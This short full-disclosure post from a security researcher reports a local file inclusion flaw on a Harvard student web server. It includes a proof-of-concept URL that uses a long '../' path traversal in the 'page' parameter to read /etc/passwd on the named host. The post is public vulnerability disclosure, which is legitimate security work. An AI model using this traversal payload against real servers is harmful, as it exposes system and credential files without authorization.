www.hcs.harvard.edu appears to suffer from a local file inclusion vulnerability.
85476df54bf5c4817f2d675f6b98efe5361ef52a29abcda9d51dd9b54615835d
Hey,
I've tried reporting issues to Harvard University tons of times in the past
but they rarely respond and even more rarely commend researchers for finding
vulnerabilities so I decided that full-disclosure was the way to get Harvard
off of their crimson asses and patch this vulnerability.
PoC link:
http://www.hcs.harvard.edu/~chtnasp/index.php?page=../../../../../../../../../../../../../../../../../../../../../etc/passwd
Enjoy,
Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground